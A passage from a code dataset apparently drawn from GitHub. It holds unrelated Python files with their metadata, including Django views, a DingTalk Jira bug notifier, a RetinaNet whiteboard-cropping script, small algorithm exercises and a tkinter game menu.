return CRUDResultSet(\n max_result_set_results=api_svc_config.max_result_set_results,\n max_result_size_bytes=api_svc_config.max_result_size_bytes,\n job_crud=job_crud(),\n )\n\n\ndef result_set_notifier() -> ResultSetNotifier:\n \"\"\"Get a ResultSetNotifier object\"\"\"\n api_svc_config = APIServiceConfig()\n return ResultSetNotifier(\n sns_topic_arn=api_svc_config.result_set_notification_sns_topic_arn,\n region_name=api_svc_config.region,\n )\n\n\ndef api_key(key: str = Depends(APIKeyHeader(name=API_KEY_HEADER_NAME))) -> str:\n \"\"\"Validate an api key string matches the value currently in SecretsManager\"\"\"\n region = APIServiceConfig().region\n current_api_key_secret = get_api_key(region_name=region)\n if key == current_api_key_secret:\n return key\n try:\n pending_api_key_secret = get_api_key(version_stage=\"AWSPENDING\", region_name=region)\n if key == pending_api_key_secret:\n return key\n except ClientError as c_e:\n response_error = getattr(c_e, \"response\", {}).get(\"Error\", {})\n error_code = response_error.get(\"Code\", \"\")\n if error_code != \"ResourceNotFoundException\":\n raise c_e\n raise HTTPException(status_code=HTTP_403_FORBIDDEN, detail=\"Could not validate credentials\")\n","repo_name":"tableau/altimeter","sub_path":"altimeter/qj/api/deps.py","file_name":"deps.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"74557156646","text":"def midIndex(a):\n # fxn to find midpoint of array\n low = 0\n high = len(a)\n return int((high-low)/2)\na = [-5, 10, -1, 15, 25, 13, -10]\n\n\ndef maxX(a, low, mid, high):\n #finds the maximum subarray which crosses the midpoint (found in above function) inside an array\n mid = midIndex(a)\n sumL = -float('inf')\n leftind = 0\n tempL = 0\n for i in range(mid, -1, -1):\n tempL += a[i]\n if tempL > sumL:\n sumL = tempL\n leftind = i\n\n sumR = -float('inf')\n rightind = 0\n tempR = 0\n for j in range(mid+1, len(a)):\n tempR += a[j]\n if tempR > sumR:\n sumR = tempR\n rightind = j\n\n sum = sumR + sumL\n return leftind, rightind, sum\n\ndef recursion(a, low, high):\n #recursion over the left and right halves, and comparison as to the largest overall subarray\n if high - 1 == low:\n return low, high, a[low]\n else:\n midd = int((high - low)/2)\n left_low, left_high, left_sum = recursion(a, low, midd)\n right_low, right_high, right_sum = recursion(a, midd + 1, high)\n cross_low, cross_high, cross_sum = maxX(a, low, midd, high)\n if left_sum > right_sum and left_sum > cross_sum:\n return left_low, left_high, left_sum\n elif right_sum > left_sum and right_sum > cross_sum:\n return right_low, right_high, right_sum\n elif cross_sum > left_sum and cross_sum > right_sum:\n return cross_low, cross_high, cross_sum\n #RuntimeError: maximum recursion depth exceeded while calling a Python object\nrecursion(a, 0, len(a))\n","repo_name":"alexmcclanahan/maxSubArray","sub_path":"d&c.py","file_name":"d&c.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7317796622","text":"from globals import MAX_HEIGHT, GRAVITY_FORCE, PIPE_WIDTH\nfrom pipe import PipeManager\n\n\nPLAYER_POS_X = 50\n\nclass Player:\n pos_x: int # FIXED VALUE\n pos_y: int\n\n def __init__(self):\n self.pos_x = PLAYER_POS_X\n self.pos_y = MAX_HEIGHT/2\n self.move = 0.0\n\n def apply_gravity(self):\n self.move += GRAVITY_FORCE\n self.pos_y += self.move\n \n def jump(self):\n 
self.move = -7.5\n\n def check_collisions(self):\n for pipe in PipeManager.pipes:\n if self.pos_x > pipe.pos_x and self.pos_x < pipe.pos_x + PIPE_WIDTH:\n # upper body\n if self.pos_y > pipe.hole_position + pipe.hole_height/2 or \\\n self.pos_y < pipe.hole_position - pipe.hole_height/2:\n return True\n","repo_name":"MichalPrzyl/flappyBirdPythonAI","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72081572968","text":"print('Введите любое целое число больше 0')\r\nN = int(input('N='))\r\ncount = 1\r\ni = 0\r\n# for i in range(N):\r\n# print(N)\r\nwhile count <= N:\r\n print(count, end = ' ')\r\n count = count * 2\r\n i = i + 1\r\n \r\n","repo_name":"Kir7879/Python_Seminar2_1","sub_path":"seminar2_3.py","file_name":"seminar2_3.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16217301229","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import JsonResponse\nfrom django.urls import reverse_lazy\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import *\nfrom .forms import *\nimport re\nfrom core.models import *\nfrom .extra import *\nfrom .bot_fechas import GeneradorCitas\nfrom ..mixins import IsSuperUserMixin\nfrom ..pruebas.extra import get_pruebas\n\n\nclass MostrarCalendarioView(TemplateView):\n model = Fecha\n template_name = 'fechas/calendar_prueba.html'\n context_object_name = 'fechas'\n extra = Extra()\n\n @method_decorator(login_required)\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n\n if request.POST['accion'] == 'filtrar_fechas':\n obj_filtro = {\n 'id_prueba': int(request.POST['select_prueba']),\n 'sedes': tuple(map(int, re.findall('[0-9]+', request.POST['sedes'])))\n }\n\n data = self.extra.get_fechas_filtradas(obj_filtro)\n\n if request.POST['accion'] == 'cargar_pruebas':\n data = get_pruebas()\n\n if request.POST['accion'] == 'cargar_sedes':\n data = [i.toJSON() for i in sede.objects.all()]\n\n if request.POST['accion'] == 'eliminar':\n fecha = Fecha.objects.get(pk=request.POST['id_evento']).delete()\n\n except Exception as e:\n data['error'] = str(e)\n print(data['error'])\n return JsonResponse(data, safe=False)\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['page_title'] = 'Listado Fechas'\n context['page_info'] = 'Fechas Disponibles'\n context['agregar_title'] = \"Agregar una Nueva Fecha\"\n return context\n\n\nclass CreateFechaListView(LoginRequiredMixin, TemplateView):\n model = Fecha\n template_name = 'fechas/create_fecha.html'\n context_object_name = 'fechas'\n form_class = FechaForm, PruebaForm\n generador_citas = GeneradorCitas\n success_url = reverse_lazy('FechaTemplateView')\n\n @method_decorator(login_required)\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n\n try:\n\n if request.POST['accion'] == 'agregar':\n self.generador_citas(request.POST).guardar_citas()\n 
data['redirect'] = True\n data['redirect_url'] = self.success_url\n\n if request.POST['accion'] == 'cargar_pruebas':\n data = get_pruebas()\n\n if request.POST['accion'] == 'cargar_sedes':\n data = [i.toJSON() for i in sede.objects.all()]\n\n except Exception as e:\n data['error'] = str(e)\n print(data['error'])\n return JsonResponse(data, safe=False)\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['page_title'] = 'Listado Fechas'\n context['page_info'] = 'Fechas Disponibles'\n context['agregar_title'] = \"Agregar una Nueva Fecha\"\n context['form'] = FechaForm()\n return context\n","repo_name":"francoag2310/app","sub_path":"core/fechas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15334682570","text":"#-*- coding:utf-8 -*-\n# list=[1,2,6,91,0,\"a\",61,39]\n# for i in list:\n# print(\"------\",i)\n# try:\n# print(2/i)\n# except Exception as e:\n# print(\"出错误的地方为:\",e)\n# else:\n# print(\"正常执行,没有错误\")\n# finally:\n# print(\"结束\")\npwd=\"23124683548\"\nif len(pwd)<8:\n ex=Exception(\"密码不能低于八位\")\n raise ex\nelse:\n print(\"zc\")\n\n\n\n","repo_name":"LMlmptm/python","sub_path":"我要自学网/python初学者4.py","file_name":"python初学者4.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34903547623","text":"\"\"\"Tools for writing actuators\"\"\"\n\nfrom click import argument, option\n\n\n\"\"\"A path to a push map file\"\"\"\npush_map_arg = argument('push-map', envvar='PUSHER_PUSH_MAP', type=str)\n\n\n\"\"\"A destination branch for pushing patches\"\"\"\ntarget_branch_arg = argument(\n 'target-branch', envvar='REPO_PUSH_BRANCH', type=str\n)\n\n\"\"\"A git refspec to check out\"\"\"\nrefspec_arg = argument('refspec', envvar='REPO_REF', type=str)\n\n\n\"\"\"A git repository to clone\"\"\"\nrepo_url_arg = argument('repo-url', envvar='REPO_URL', type=str)\n\n\n\"\"\"A flag to add 'automerge' in commit header\"\"\"\nautomerge_opt = option('--automerge', envvar='AUTOMERGE', is_flag=True)\n\n","repo_name":"oVirt/jenkins","sub_path":"stdci_libs/actuators/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"17685538198","text":"import numpy as np\nimport cv2\n\nfrom ClassifiyImages_with_MobileNet import Classify\n\nclass Videoextractor:\n def __init__(self):\n #self.classifier = Classify(\"../../Inception_10000_6600Images/output_labels.txt\", \"../../Inception_10000_6600Images/output_graph.pb\", 'DecodeJpeg/contents:0', 'final_result:0')\n #self.classifier = Classify(\"../../Inception_5000_3Classes/output_labels.txt\", \"../../Inception_5000_3Classes/output_graph.pb\", 'DecodeJpeg/contents:0', 'final_result:0')\n self.classifier = Classify(\"D:/tf\\output_labels.txt\", \"D:/tf\\output_graph.pb\", 'input:0', 'final_result:0')\n\n def createVideo(self):\n cap = cv2.VideoCapture('D:\\Download\\hot_vids\\output5.mpg')\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n bottomLeftCornerOfText = (20,400)\n fontScale = 1\n fontColor = (255,255,255)\n lineType = 2\n\n while(cap.isOpened()):\n ret, frame = cap.read()\n\n cv2.imwrite('bild.jpg',frame)\n #classification_text = self.direction_to_number(self.classifier.classifyAImage('bild.jpg'))\n classification_text = 
str(self.classifier.classify_image('bild.jpg'))\n cv2.putText(frame, 'Position: ' + classification_text, bottomLeftCornerOfText, font, fontScale, fontColor, lineType)\n cv2.imshow('frame', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\ndef main():\n extractor = Videoextractor()\n extractor.createVideo()\n\nif __name__ == \"__main__\":\n main()","repo_name":"markusgl/drone-control-system","sub_path":"NotUsed/videoextraction_with_MobileNet.py","file_name":"videoextraction_with_MobileNet.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"11073415869","text":"\nimport keras\nfrom keras_retinanet import models\nfrom keras_retinanet.utils.image import read_image_bgr, preprocess_image, resize_image\nfrom keras_retinanet.utils.visualization import draw_box, draw_caption\nfrom keras_retinanet.utils.colors import label_color\nimport cv2\nimport os\nimport numpy as np\nimport time\nimport tensorflow as tf\nimport math\nfrom matplotlib import pyplot as plt\nimport csv\nfrom PIL import ExifTags\n\ndef get_session():\n config = tf.compat.v1.ConfigProto()\n config.gpu_options.allow_growth = True\n return tf.compat.v1.Session(config=config)\n\n### Detection on images\n\nmin_score = 0.6\nmodel_path = '/home/golah/whiteboard_project/machine_learning/converted_neural_models/converted_model_train_9_100.h5' ## replace this with your model path\nmodel = models.load_model(model_path, backbone_name='resnet50')\nlabels_to_names = {0:'whiteboard'} ## replace with your model labels and its index val\n\n#input_path = '/home/golah/whiteboard_project/projects/miki/images/01_test_images_low_res_old_board/original_images/'\n#output_path = '/home/golah/whiteboard_project/projects/miki/images/01_test_images_low_res_old_board/box_images/'\n#crop_output = '/home/golah/whiteboard_project/projects/miki/images/01_test_images_low_res_old_board/cropped_images/' ## output containing crop results\n\n#input_path = '/home/golah/whiteboard_project/projects/miki/images/02_test_images_high_res_old_board/original_images/'\n#input_path = '/home/golah/whiteboard_project/projects/miki/images/02_test_images_high_res_old_board/res_images/'\n#output_path = '/home/golah/whiteboard_project/projects/miki/images/02_test_images_high_res_old_board/box_images/'\n#crop_output = '/home/golah/whiteboard_project/projects/miki/images/02_test_images_high_res_old_board/cropped_images/' ## output containing crop results\n\n#input_path = '/home/golah/whiteboard_project/projects/miki/images/03_test_images_low_res_new_board/original_images/'\n#output_path = '/home/golah/whiteboard_project/projects/miki/images/03_test_images_low_res_new_board/box_images/'\n#crop_output = '/home/golah/whiteboard_project/projects/miki/images/03_test_images_low_res_new_board/cropped_images/' ## output containing crop results\n\ninput_path = '/home/golah/whiteboard_project/projects/miki/images/04_test_images_high_res_new_board/original_images/'\noutput_path = '/home/golah/whiteboard_project/projects/miki/images/04_test_images_high_res_new_board/box_images/'\ncrop_output = '/home/golah/whiteboard_project/projects/miki/images/04_test_images_high_res_new_board/cropped_images/' ## output containing crop results\n\n\nunique_identifier = 'box_'\nnew_boxes = []\nbox_coords_path = '/home/golah/whiteboard_project/projects/miki/results/box_coords.csv' ## your path to the csv file containing coordinates\noutlier_images_path = 
'/home/golah/whiteboard_project/projects/miki/results/outlier_names.csv' ## your path to the csv file containing coordinates\ncut_coords_path = '/home/golah/whiteboard_project/projects/miki/results/cut_coords.csv' ## your path to the csv file containing coordinates\nheight_to_width_ratio = 0.70\nimage_names = []\noutlier_images = []\ncoords = []\nsave_results = True\ndef detection_on_image(image_path,output_full_path):\n \n image = cv2.imread(image_path)\n draw = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = preprocess_image(image)\n h, w = image.shape[:2]\n image, scale = resize_image(image)\n boxes, scores, labels = model.predict_on_batch(np.expand_dims(image, axis=0))\n max_score = scores.max()\n boxes /= scale\n if np.all(scores[0] < min_score):\n print(file, \": NO BOX\")\n outlier_images.append(file)\n new_boxes.append(np.array([0,0,0,0]))\n else: \n for box, score, label in zip(boxes[0], scores[0], labels[0]):\n if score < max_score:\n break\n\n if score < min_score:\n break\n \n print(\"Confidence_score:\", score)\n print(\"Label:\", labels_to_names[label])\n # Draw box\n color = label_color(label)\n b = box.astype(int)\n draw_box(draw, b, color=color)\n caption = \"{} {:.3f}\".format(labels_to_names[label], score)\n draw_caption(draw, b, caption)\n new_boxes.append(b.copy())\n detected_img = cv2.cvtColor(draw, cv2.COLOR_RGB2BGR)\n if save_results == True:\n cv2.imwrite(output_full_path, detected_img)\n #cv2.imshow('Detection',detected_img)\n #cv2.waitKey(0)\n\n### RUN DETECTION ON ALL IMAGES IN THE INPUT FOLDER\n\nfor file in os.listdir(input_path):\n input_full_path = os.path.join(input_path,file)\n output_full_path = os.path.join(output_path,(unique_identifier+file))\n detection_on_image(input_full_path,output_full_path)\n print(file + \" DONE\")\n\nif save_results == True:\n print(\"Box detection results saved to:\" +output_path)\nnp.savetxt(box_coords_path, new_boxes, delimiter=',') ### SAVE COORDS TO CSV\nprint(\"Box coordinates saved to:\", box_coords_path)\nwith open(outlier_images_path, 'w') as f_0:\n for i in outlier_images:\n f_0.write(\"%s\\n\"% i)\nprint(\"List of images without detected box saved to:\", outlier_images_path)\n\n\n### CUT OUT THE TABLES ACCORDING TO THE BOX COORDINATES\n\n#for file in enumerate(list_of_files):\nfor file in enumerate(os.listdir(input_path)):\n print(\"Cropping the images...\")\n output_full_path = os.path.join(input_path, file[1])\n image = cv2.imread(output_full_path)\n if new_boxes[file[0]][0] == 0:\n print(file[1], \": NO BOX\")\n continue\n first_row = new_boxes[file[0]][0] ## x-max\n first_col = new_boxes[file[0]][1] ## y-max\n last_row = new_boxes[file[0]][2] ## x-min\n last_col = new_boxes[file[0]][3] ## y-min\n # Check image's height to width ratio.\n h, w = image.shape[:2]\n if h / w < height_to_width_ratio:\n print(\"ROTATE\")\n if first_row > w / 2:\n cropped_image = image[first_col:last_col, first_row:last_row]\n cropped_image = cv2.rotate(cropped_image, cv2.ROTATE_90_COUNTERCLOCKWISE)\n coords.append([image.shape[1] - last_row, first_col, last_col])\n else:\n cropped_image = image[first_col:last_col, last_row:first_row]\n cropped_image = cv2.rotate(cropped_image, cv2.ROTATE_90_CLOCKWISE)\n coords.append([image.shape[1] - first_row, first_col, last_col])\n\n else:\n cropped_image = image[first_col:last_col, first_row:last_row]\n coords.append([first_col, first_row, last_row])\n image_names.append(file[1])\n if save_results == True:\n crop_output_full_path = os.path.join(crop_output, file[1])\n 
cv2.imwrite(crop_output_full_path, cropped_image)\n\n# Save coords to csv\ncoords_dict = {}\n\nfor i in range(0,len(image_names),1):\n coords_dict[image_names[i]] = coords[i]\n\nwith open(cut_coords_path, 'w') as f_1:\n for key in coords_dict.keys():\n f_1.write(\"%s;%s\\n\"%(key,coords_dict[key]))\n\nprint(\"Image cropping results saved to:\" + crop_output)\nprint(\"Cut coordinates saved to:\", cut_coords_path)\n","repo_name":"EvoZooDeb/whiteboard","sub_path":"prototype_03/03_01_box_detect_an_cut.py","file_name":"03_01_box_detect_an_cut.py","file_ext":"py","file_size_in_byte":7594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22959318167","text":"\nimport pygal\nfrom die import Die \n\n\ndie_1 = Die()\ndie_2 = Die()\ndie_3 = Die()\n\ndice = [die_1, die_2]\n\n\nresults = []\n\nfor roll_number in range(100000):\n\tresults.append(die_1.roll() * die_2.roll())\n\n\n\n\nfrequencies = [results.count(value) for value in range(1, die_1.num_sides*die_2.num_sides+1)]\n\n\n\nhist = pygal.Bar()\n\nhist.title = 'Results of rolling three dice 10000 times'\nhist.x_labels = [values for values in range(1, die_1.num_sides*die_2.num_sides+1)]\n\nhist.x_title = \"Results\"\nhist.y_title = \"Frequency of Result\"\n\nhist.add('dice', frequencies)\nhist.render_to_file('die_visual.svg')\n\n\n","repo_name":"tengyaolong2000/Random-stuff","sub_path":"Python Projects/die_visual.py","file_name":"die_visual.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10408746566","text":"# !/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\"\"\"\n@Project :JiraBugPush\n@File :dingController.py\n@Author :琴师\n@Date :2022/10/28 10:19 上午\n\"\"\"\n\n# 今天\n\nimport dataSearchController\nimport requests\nimport json\nimport time\nfrom datetime import date\n\n# 今天\ntoday = date.today()\n\n\ndef getRequestUri():\n access_token = \"52097df2c2495168c6918c7c5ac468d9b14d8361753fe87axxxxxx\"\n uri = \"https://oapi.xxxxxxx?\" + \"access_token=%s\" % access_token\n return uri\n\n\ndef getRequestData(nums):\n my_data = {\n \"msgtype\": \"markdown\",\n \"markdown\": {\n \"title\": \"JIRA\",\n \"text\": \"我就是我, 是不一样的烟火\"\n },\n \"at\": {\n \"isAtAll\": True\n }\n }\n if len(nums):\n # summary = \"\\n\"\n testProblem = \"\\n\"\n productProblem = \"\\n\"\n uat = \"\\n\"\n if dataSearchController.dataSearchType(bugtype=\"转测问题\"):\n for x in dataSearchController.dataSearchType(bugtype=\"转测问题\"):\n testProblem += x[6] + \"\\t\\t\\t\" + \"经办人:\" + \\\n x[4] + \"\\n\" + \"状态:\" + x[5] + \"\\n\"\n else:\n testProblem = \"0\" + \"\\n个\"\n\n if dataSearchController.dataSearchType(bugtype=\"体验走查\"):\n for y in dataSearchController.dataSearchType(bugtype=\"体验走查\"):\n uat += y[6] + \"\\t\\t\\t\" + \"经办人:\" + \\\n y[4] + \"\\n\" + \"状态:\" + y[5] + \"\\n\"\n else:\n uat = \"0\" + \"\\n个\"\n\n if dataSearchController.dataSearchType(bugtype=\"线上问题\"):\n for z in dataSearchController.dataSearchType(bugtype=\"线上问题\"):\n productProblem += z[6] + \"\\t\\t\\t\" + \\\n \"经办人:\" + z[4] + \"\\n\" + \"状态:\" + z[5] + \"\\n\"\n else:\n productProblem = \"0\" + \"\\n个\"\n\n res_content = \"今日新增问题:{}个,具体问题如下:\\n\" \\\n \"\\n【--转测问题--】:{}\\n\" \\\n \"=======================================\" \\\n \"\\n【--体验走查--】:{}\\n\" \\\n \"=======================================\" \\\n \"\\n【--线上问题(历史版本遗留)--】:{}\\n\\n\" \\\n \"=======================================\" \\\n \"\\nTips:优先解决转测问题和线上问题即可~\\n\".format(len(nums), 
testProblem, uat, productProblem)\n        my_data[\"markdown\"][\"text\"] = res_content\n        return my_data\n    else:\n        res_content = \"今日新增问题:{}个\".format(len(nums))\n        my_data[\"markdown\"][\"text\"] = res_content\n        return my_data\n\n\ndef send_request():\n    # send the request to the given url with the given payload\n    # build the request headers\n    header = {\"content-Type\": \"application/json\", \"Charset\": \"UTF-8\",\n              \"timestamp\": str(round(time.time() * 1000))}\n    sendData = json.dumps(\n        getRequestData(\n            dataSearchController.dataSearch()))  # serialize the dict to a JSON string\n    res = requests.post(\n        url=getRequestUri(),\n        data=sendData,\n        headers=header,\n        verify=False)\n    # parse the response body as JSON and return it\n    return res.json()\n\n\nif __name__ == \"__main__\":\n    pass\n\n","repo_name":"Amoqinshi/JiraBugPush","sub_path":"dingController.py","file_name":"dingController.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} {"seq_id":"7387688267","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# vim: autoindent shiftwidth=4 expandtab textwidth=80 tabstop=4 softtabstop=4\n###############################################################################\n\nimport serial\n\n\n\n# files = ['setup.zpl', 'data1.zpl', 'data2.zpl']\nfiles = ['delete_image.zpl']\n\nfor file in files:\n    ser = serial.Serial('/dev/ttyUSB0', baudrate=9600, bytesize=8, parity='N',\n                        stopbits=1, xonxoff=0, timeout=5)\n    with open(file, 'r') as f:\n        label = f.read()\n    ser.write(label.encode())\n    ser.close()\n\n","repo_name":"ssharpjr/part-label","sub_path":"examples/serial_test.py","file_name":"serial_test.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"28614198400","text":"# Python Program to Interchange two Elements of the List without touching the Key Field\r\n# Node class to create individual nodes for the linked list\r\nclass Node:\r\n    def __init__(self, value):\r\n        self.value = value\r\n        self.next = None\r\n\r\n# LinkedList class to manage the nodes and perform operations on the linked list\r\nclass LinkedList:\r\n    def __init__(self):\r\n        self.head = None\r\n\r\n    # Method to add a new node at the end of the linked list\r\n    def append(self, value):\r\n        new_node = Node(value)\r\n        if self.head is None:\r\n            self.head = new_node\r\n            return\r\n        last_node = self.head\r\n        while last_node.next:\r\n            last_node = last_node.next\r\n        last_node.next = new_node\r\n\r\n    # Method to print the linked list\r\n    def display(self):\r\n        current = self.head\r\n        while current:\r\n            print(current.value, end=\" -> \")\r\n            current = current.next\r\n        print(\"None\")\r\n\r\n    # Method to interchange two elements without changing the key field\r\n    def interchange_elements(self, index1, index2):\r\n        # if both indices are the same there is nothing to swap\r\n        if index1 == index2:\r\n            # return without doing anything\r\n            return\r\n\r\n        prev1 = None\r\n        current1 = self.head\r\n        count1 = 0\r\n        while current1 and count1 != index1:\r\n            prev1 = current1\r\n            current1 = current1.next\r\n            count1 += 1\r\n\r\n        prev2 = None\r\n        current2 = self.head\r\n        count2 = 0\r\n        while current2 and count2 != index2:\r\n            prev2 = current2\r\n            current2 = current2.next\r\n            count2 += 1\r\n\r\n        # both traversals have now reached their target positions;\r\n        # if either node is None, an index was out of range, so do nothing\r\n        if not current1 or not current2:\r\n            return\r\n\r\n        # relink the predecessor of the first node so it points at the second node\r\n        if prev1:\r\n            prev1.next = current2\r\n        # if prev1 does not exist, current1 was the head of the list, so current2 becomes the new head\r\n        else:\r\n            self.head = current2\r\n\r\n        # relink the predecessor of the second node so it points at the first node\r\n        if prev2:\r\n            prev2.next = current1\r\n        # if prev2 does not exist, current2 was the head, so current1 becomes the new head\r\n        else:\r\n            self.head = current1\r\n\r\n        # finally swap the next pointers so each node takes over the\r\n        # other's successor and the rest of the list stays intact\r\n        current1.next, current2.next = current2.next, current1.next\r\n\r\n# Example usage:\r\nif __name__ == \"__main__\":\r\n    # Creating a linked list\r\n    linked_list = LinkedList()\r\n    linked_list.append(1)\r\n    linked_list.append(2)\r\n    linked_list.append(3)\r\n    linked_list.append(4)\r\n    linked_list.append(5)\r\n\r\n    # Displaying the original linked list\r\n    print(\"Original Linked List:\")\r\n    linked_list.display()\r\n\r\n    # Interchanging elements at indices 1 and 3\r\n    linked_list.interchange_elements(1, 3)\r\n\r\n    # Displaying the modified linked list after interchanging elements\r\n    print(\"\\nLinked List after interchanging elements at indices 1 and 3:\")\r\n    linked_list.display()\r\n","repo_name":"coderkarunakar/linked_list-2","sub_path":"practice/interchange_LL..py","file_name":"interchange_LL..py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"74514324968","text":"from django.conf.urls import url\n\nfrom . import views\n\nissue_list_view = views.IssueListView.as_view()\nissue_create_view = views.IssueCreateView.as_view()\nissue_detail_view = views.IssueDetailView.as_view()\nissue_update_view = views.IssueUpdateView.as_view()\nissue_delete_view = views.IssueDeleteView.as_view()\n\nurlpatterns = [\n    url(r'^$', issue_list_view, name='issue_list'),\n    url(r'^create/$', issue_create_view, name='issue_create'),\n    url(r'^(?P<pk>\\d+)/$', issue_detail_view, name='issue_detail'),\n    url(r'^(?P<pk>\\d+)/edit/$', issue_update_view, name='issue_update'),\n    url(r'^(?P<pk>\\d+)/delete/$', issue_delete_view, name='issue_delete'),\n]\n","repo_name":"lucifurtun/issue-tracker","sub_path":"apps/tracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"35842634635","text":"''' Our main menu + settings menu '''\n\nimport tkinter as tk\nimport tkinter.font as tkfont\nimport os\nimport json\nfrom test import start_level\nfrom time import time, sleep\nimport functools\n\n\n# set default settings\nuser_settings = {\n    \"sound\": False,\n    \"jump\": \"w\",\n    \"duck\": \"s\",\n    \"run_right\": \"d\",\n    \"run_left\": \"a\",\n    \"force\": \"e\",\n    \"atack\": \"space\"\n}\n\n# init globals\nframes_lapsed = 0\nstate = \"\"\nstates_label = {\n    \"sound\": False,\n    \"jump\": None,\n    \"duck\": None,\n    \"run_right\": None,\n    \"run_left\": None,\n    \"force\": None,\n    \"atack\": None\n}\nmy_objects = []\ndrag_point = {}\ncurrent_drag_sprite = None\npicture_parent_directory = './menu_pics/'\nsettings_file_name = 'settings.json'\ngame_not_started = True\nwindow_width = 1600\nwindow_height = 800\nbackground_width = 2600\n\nTARGET_FPS = 30\nframe_period = 1.0/TARGET_FPS\nnow = time()\nnext_frame_time = now + 
frame_period\n\n# declare classes\nclass Sprite:\n ''' Pictures on the main screen '''\n anchor_offsets = {\n tk.CENTER: {'x': -0.5, 'y': -0.5},\n tk.NW: {'x': 0, 'y': 0},\n tk.SW: {'x': 0, 'y': -1},\n tk.NE: {'x': -1, 'y': 0},\n tk.SE: {'x': -1, 'y': -1}\n }\n\n def __init__(\n self, ID=\"?\",x=0, y=0, width=0, height=0,\n anchor=tk.NW, img_file=None, parent_frame=None\n ):\n self.ID = ID\n self.x = x + width * self.anchor_offsets[anchor]['x']\n self.y = y + height * self.anchor_offsets[anchor]['y']\n self.width = width\n self.height = height\n self.image = tk.PhotoImage(file=img_file)\n self.instance = parent_frame.create_image(\n x, y,\n anchor=anchor,\n image=self.image\n )\n self.parent_frame=parent_frame\n self.last_movement_x = 0\n self.last_movement_y = 0\n\n def on_click(self, offset_x, offset_y):\n ''' Might be overriden '''\n pass # noqa , function meant to be extended\n\n def move(self, dx, dy):\n ''' Moves sprite if needed '''\n self.parent_frame.move(self.instance, dx, dy)\n self.x += dx\n self.y += dy\n self.last_movement_x = dx\n self.last_movement_y = dy\n\nclass DragableSprite(Sprite):\n ''' Sprites which you can move with mouse '''\n def on_click(self, offset_x, offset_y):\n global current_drag_sprite\n\n self.drag_point = {\"x\": offset_x, \"y\": offset_y}\n\n current_drag_sprite = self\n\nclass PlayButton(Sprite):\n ''' Button that starts level '''\n def on_click(self, offset_x, offset_y):\n global game_not_started\n\n main_menu.pack_forget()\n game_not_started = False\n start_level(root)\n\nclass SettingsButton(Sprite):\n ''' Button that sends you to settings menu '''\n def on_click(self, offset_x, offset_y):\n change_frame(main_menu, settings_frame)\n\nclass ExitButton(Sprite):\n ''' Button that exits program '''\n def on_click(self, offset_x, offset_y):\n os._exit(0) # noqa , only way to kill child processes\n\n\n# set up screen\nroot = tk.Tk()\nroot.geometry(str(window_width)+'x'+str(window_height))\n\nmain_menu = tk.Canvas(root, bg=\"black\")\nmain_menu.pack(fill=tk.BOTH, expand=1)\n\nsettings_frame =\\\n tk.Frame(root, width=window_width, height=window_height, bg=\"black\")\n\nb_background =\\\n tk.PhotoImage(file=picture_parent_directory+\"b_background.png\")\nb_background_instance =\\\n main_menu.create_image(0, 0, image=b_background, anchor=tk.NW)\nb_background_instance_next =\\\n main_menu.create_image(background_width/2, 0, image=b_background, anchor=tk.NW)\n\nmy_objects.append(\n DragableSprite(\n x=80,\n y=500,\n width=65,\n height=97,\n img_file=picture_parent_directory+\"b_planet_ring.png\",\n parent_frame=main_menu\n )\n)\nmy_objects.append(\n DragableSprite(\n x=1100,\n y=50,\n width=57,\n height=57,\n img_file=picture_parent_directory+\"b_planet.png\",\n parent_frame=main_menu\n )\n)\nmy_objects.append(\n DragableSprite(\n 